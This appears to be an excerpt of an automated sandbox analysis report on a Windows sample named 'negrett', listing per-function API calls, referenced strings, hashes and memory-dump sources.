                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: f49a279dbb5d66223c516b1a2d877dc49cd2379c8ced21b537b24de27ce54ad8
                                                • Instruction ID: 1e9f25657a9ec939ac4aab2f52128eee192007f738ed4971b129348d6fa5bc34
                                                • Opcode Fuzzy Hash: f49a279dbb5d66223c516b1a2d877dc49cd2379c8ced21b537b24de27ce54ad8
                                                • Instruction Fuzzy Hash: 0D61E2B5E00219EFCF15CFA8D885AAEBBF5FF48310F208569E955A7250E770A941CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: |L$ }L$0{L$@|L$@}L$P|L$|L
                                                • API String ID: 176396367-3207688415
                                                • Opcode ID: 8807b4f69262fba17d8f9ff17325311a2a919ab90b44a527380ca82cee991e05
                                                • Instruction ID: 441fc02d073ebc5bb492f41630e0da436a5607ee7b2534a8853d29892a8c1eff
                                                • Opcode Fuzzy Hash: 8807b4f69262fba17d8f9ff17325311a2a919ab90b44a527380ca82cee991e05
                                                • Instruction Fuzzy Hash: 87E19E312082219FCB14DF24C59092BB7E6BFC9758B14895DF896DBBA0DB34ED45CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 02A0CE96
                                                • ___free_lconv_mon.LIBCMT ref: 02A0CEA1
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CA59
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CA6B
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CA7D
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CA8F
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAA1
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAB3
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAC5
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAD7
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAE9
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CAFB
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CB0D
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CB1F
                                                  • Part of subcall function 02A0CA3C: _free.LIBCMT ref: 02A0CB31
                                                • _free.LIBCMT ref: 02A0CEB8
                                                • _free.LIBCMT ref: 02A0CECD
                                                • _free.LIBCMT ref: 02A0CED8
                                                • _free.LIBCMT ref: 02A0CEFA
                                                • _free.LIBCMT ref: 02A0CF0D
                                                • _free.LIBCMT ref: 02A0CF1B
                                                • _free.LIBCMT ref: 02A0CF26
                                                • _free.LIBCMT ref: 02A0CF5E
                                                • _free.LIBCMT ref: 02A0CF65
                                                • _free.LIBCMT ref: 02A0CF82
                                                • _free.LIBCMT ref: 02A0CF9A
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _free$___free_lconv_mon
                                                • String ID:
                                                • API String ID: 3658870901-0
                                                • Opcode ID: ba9ecef691faa970056ea1d3866dd1f1132379091b2b346f906a9454ef583009
                                                • Instruction ID: 54cbac58896de14abd21df6dda23d3eed92f0237ef90de8f5a2bae9613f9e709
                                                • Opcode Fuzzy Hash: ba9ecef691faa970056ea1d3866dd1f1132379091b2b346f906a9454ef583009
                                                • Instruction Fuzzy Hash: 82314A326803059FEB21AB79F9C4B9A77EBAF00325F104A2BE449D71D0DF30A9419F11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00B74994
                                                • GetWindowTextW.USER32 ref: 00B749DA
                                                • _wcslen.LIBCMT ref: 00B749EB
                                                • CharUpperBuffW.USER32(?,00000000), ref: 00B749F7
                                                • _wcsstr.LIBVCRUNTIME ref: 00B74A2C
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00B74A64
                                                • GetWindowTextW.USER32 ref: 00B74A9D
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00B74AE6
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00B74B20
                                                • GetWindowRect.USER32(?,?), ref: 00B74B8B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                • String ID: ThumbnailClass
                                                • API String ID: 1311036022-1241985126
                                                • Opcode ID: 18bff6d170f578e1a45565be09e3dc6ff46bb1cbdd7c24691ee378c47a452146
                                                • Instruction ID: 1af71e531f21094e26f61abf196aeafcc0b0f2c41fc4d07b6eff3127b9b03646
                                                • Opcode Fuzzy Hash: 18bff6d170f578e1a45565be09e3dc6ff46bb1cbdd7c24691ee378c47a452146
                                                • Instruction Fuzzy Hash: 8691CF310082059FDB15DF14C981BAAB7E8FF84315F0484AAFDA99B196DB30ED45CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B29BB2
                                                • PostMessageW.USER32 ref: 00BA8D5A
                                                • GetFocus.USER32 ref: 00BA8D6A
                                                • GetDlgCtrlID.USER32 ref: 00BA8D75
                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00BA8E1D
                                                • GetMenuItemInfoW.USER32 ref: 00BA8ECF
                                                • GetMenuItemCount.USER32(?), ref: 00BA8EEC
                                                • GetMenuItemID.USER32(?,00000000), ref: 00BA8EFC
                                                • GetMenuItemInfoW.USER32 ref: 00BA8F2E
                                                • GetMenuItemInfoW.USER32 ref: 00BA8F70
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BA8FA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                • String ID: 0
                                                • API String ID: 1026556194-4108050209
                                                • Opcode ID: 94bfea7f9204cd4989c09b20edb8a5b5a3ea20b6e16ca1dec60505925c733886
                                                • Instruction ID: 837e730344168b9c78ff1472fc3d57ae002264c730428ff7241580ce29019558
                                                • Opcode Fuzzy Hash: 94bfea7f9204cd4989c09b20edb8a5b5a3ea20b6e16ca1dec60505925c733886
                                                • Instruction Fuzzy Hash: B781BF71508301AFDB10CF24D885AABBBE9FF8A314F1409ADF98997691DF31D900CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B9CC64
                                                • RegOpenKeyExW.ADVAPI32 ref: 00B9CC8D
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B9CD48
                                                  • Part of subcall function 00B9CC34: RegCloseKey.ADVAPI32(?), ref: 00B9CCAA
                                                  • Part of subcall function 00B9CC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B9CCBD
                                                  • Part of subcall function 00B9CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 00B9CCCF
                                                  • Part of subcall function 00B9CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B9CD05
                                                  • Part of subcall function 00B9CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B9CD28
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B9CCF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2734957052-4033151799
                                                • Opcode ID: fed612ace47f82d9d5c0d059fa52c0b91ae287a15cd86c8eabb6c6862333a357
                                                • Instruction ID: 2d0538b8019422c63242b4597708717df1ee23482296d813249e5572e629ec4b
                                                • Opcode Fuzzy Hash: fed612ace47f82d9d5c0d059fa52c0b91ae287a15cd86c8eabb6c6862333a357
                                                • Instruction Fuzzy Hash: EC316C71A41129BBDB208B55DC89EFFBFBCEF46750F0001B5E906E3250DB349E459AA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • timeGetTime.WINMM ref: 00B7E6B4
                                                  • Part of subcall function 00B2E551: timeGetTime.WINMM ref: 00B2E555
                                                • Sleep.KERNEL32(0000000A), ref: 00B7E6E1
                                                • EnumThreadWindows.USER32 ref: 00B7E705
                                                • FindWindowExW.USER32 ref: 00B7E727
                                                • SetActiveWindow.USER32 ref: 00B7E746
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B7E754
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B7E773
                                                • Sleep.KERNEL32(000000FA), ref: 00B7E77E
                                                • IsWindow.USER32 ref: 00B7E78A
                                                • EndDialog.USER32 ref: 00B7E79B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: b876ec2d7bf2d32cd704aa5a22f87abbf8db3deaf59c32d86064e7c13e88cd65
                                                • Instruction ID: 8004b99288d6bb0145eb3ddd3b689e21849b4402e0b2385251a6bb8753280f48
                                                • Opcode Fuzzy Hash: b876ec2d7bf2d32cd704aa5a22f87abbf8db3deaf59c32d86064e7c13e88cd65
                                                • Instruction Fuzzy Hash: 69216270200245AFEB005F24ECCAA253FEDEF5A749B1084A5F53D871B1DFB1EC009A24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B7EA5D
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B7EA73
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7EA84
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B7EA96
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B7EAA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: SendString$_wcslen
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 2420728520-1007645807
                                                • Opcode ID: fe9a6bfbb7fc7764a42a59638cbdce9a5f6e981cb3420cf57df67f7f634bd72b
                                                • Instruction ID: 719932d15d26f530c8e7ee59c6103b0a7820b30664209a056c254343bbd09ff1
                                                • Opcode Fuzzy Hash: fe9a6bfbb7fc7764a42a59638cbdce9a5f6e981cb3420cf57df67f7f634bd72b
                                                • Instruction Fuzzy Hash: 39119131A5025979D720A7A1DC5ADFFABFCEFD5B40F4004AAB821A20E0EEB05945C5B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B28F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00B28FC5
                                                • DestroyWindow.USER32 ref: 00B28C81
                                                • KillTimer.USER32 ref: 00B28D1B
                                                • DestroyAcceleratorTable.USER32 ref: 00B66973
                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00B28BBA,00000000,?), ref: 00B669A1
                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00B28BBA,00000000,?), ref: 00B669B8
                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B28BBA,00000000), ref: 00B669D4
                                                • DeleteObject.GDI32(00000000), ref: 00B669E6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
                                                • Opcode ID: 7699592466685020968bb28ba079794c1e06b2cdf514a3de4060345784c74c61
                                                • Instruction ID: bae18e52b0cde7ca2938dfa971a09973a8e3df53950ae13e47c9b87182e7b27d
                                                • Opcode Fuzzy Hash: 7699592466685020968bb28ba079794c1e06b2cdf514a3de4060345784c74c61
                                                • Instruction Fuzzy Hash: 5D61AE31502660DFDB259F18EA89B297BF1FF45312F2449ADE04A9B5A0CF35AC91CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B16B57: _wcslen.LIBCMT ref: 00B16B6A
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B707A2
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B707BE
                                                • RegOpenKeyExW.ADVAPI32 ref: 00B707DA
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00B70804
                                                • CLSIDFromString.OLE32(?,000001FE), ref: 00B7082C
                                                • RegCloseKey.ADVAPI32(?), ref: 00B70837
                                                • RegCloseKey.ADVAPI32(?), ref: 00B7083C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 323675364-22481851
                                                • Opcode ID: 81a20aad3e6e744cc163eedce303b9d685fc6d88ab41ed47893f5457e1a8a5cc
                                                • Instruction ID: 41ffbd385eeab4f4a90dad2b3060322c10f43ec2ca77d6d05c8293f606a189f6
                                                • Opcode Fuzzy Hash: 81a20aad3e6e744cc163eedce303b9d685fc6d88ab41ed47893f5457e1a8a5cc
                                                • Instruction Fuzzy Hash: 9441E872C10229EBDF25EBA4DC958EDB7B8FF04750B5441AAE915A3161EB30AE44CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: {L$0{L$@|L$`}L$lgL
                                                • API String ID: 176396367-1937145518
                                                • Opcode ID: 0d706242c2a0dbafdc1c0f9a3adb8007824529ebefb0d02c43683025eda856c5
                                                • Instruction ID: 166cf62401fdbde6dd21397947160d073005eb41e5d98ed6b875ac144f8d6dda
                                                • Opcode Fuzzy Hash: 0d706242c2a0dbafdc1c0f9a3adb8007824529ebefb0d02c43683025eda856c5
                                                • Instruction Fuzzy Hash: EBE18F352083118FCB14DF24C590A2AB7E2BF89354F14895DF8969B761DB35ED49CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: 4wL$@wL$hwL
                                                • API String ID: 176396367-462698015
                                                • Opcode ID: 14acc0bdb987110b7d5a089c68d16b417f5c68108f78ca02a8b0f493d2635f26
                                                • Instruction ID: 3eefaeb085098084fc62dd4c7f87b207248cfa499ca3df2a66e98215a8e72f65
                                                • Opcode Fuzzy Hash: 14acc0bdb987110b7d5a089c68d16b417f5c68108f78ca02a8b0f493d2635f26
                                                • Instruction Fuzzy Hash: 2F71F8326001368BCB209F7C8D906BF73A2AF5066DB14492AFC6697298EF35CD45CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00B905BC
                                                • inet_addr.WSOCK32(?), ref: 00B9061C
                                                • gethostbyname.WSOCK32(?), ref: 00B90628
                                                • IcmpCreateFile.IPHLPAPI ref: 00B90636
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B906C6
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B906E5
                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 00B907B9
                                                • WSACleanup.WSOCK32 ref: 00B907BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: 6a7c4bedfcfd630c5cf631aa73c47abc115d5b425dc32a4caac33762159b52a7
                                                • Instruction ID: 9d7d2355815f578fb610f0aa229a3df3adba3c9ebb6d8ea12bd59f20538da499
                                                • Opcode Fuzzy Hash: 6a7c4bedfcfd630c5cf631aa73c47abc115d5b425dc32a4caac33762159b52a7
                                                • Instruction Fuzzy Hash: 44919D356182019FDB20EF15C489F1ABBE0EF44328F1585E9F4699B6A2CB34EC85CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharLower
                                                • String ID: cdecl$none$stdcall$winapi
                                                • API String ID: 707087890-567219261
                                                • Opcode ID: 9503e274aba99c7678df39455723939a3b6330799482a2665ed05ff68aebaa70
                                                • Instruction ID: 42d8903d1907e873435a2f034e3abe74e4196fb852737053a007733b8183b7cc
                                                • Opcode Fuzzy Hash: 9503e274aba99c7678df39455723939a3b6330799482a2665ed05ff68aebaa70
                                                • Instruction Fuzzy Hash: 0A519E32A005169BCF14DF68C9909BEB7E6EF66720B6142B9E426E7284EB31DD40C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 00B88257
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B88267
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B88273
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B88310
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00B88324
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00B88356
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B8838C
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00B88395
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                • String ID: *.*
                                                • API String ID: 1464919966-438819550
                                                • Opcode ID: 4db13ee5216e7e3a53de7fc934aca930d9d08723b23b945c77541f1436fb7db5
                                                • Instruction ID: f95da6730b5362effa3786fa966feec44641a4e51e85d45ff46768c38636dace
                                                • Opcode Fuzzy Hash: 4db13ee5216e7e3a53de7fc934aca930d9d08723b23b945c77541f1436fb7db5
                                                • Instruction Fuzzy Hash: D5619E725043059FCB10EF64C8819AEB3E9FF89310F44899EF999D7261EB31E945CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
                                                • Instruction ID: 5ad32a276c032faefbe04b5f0bd4598d7dfd6af6ae24e6736f500628c757e9b1
                                                • Opcode Fuzzy Hash: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
                                                • Instruction Fuzzy Hash: 35117476540209AFCB01EF54EA81CDD3BA6EF05350B5189A5FA0C9F2A1DE31EE51AF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 00B42C94
                                                  • Part of subcall function 00B429C8: HeapFree.KERNEL32(00000000,00000000), ref: 00B429DE
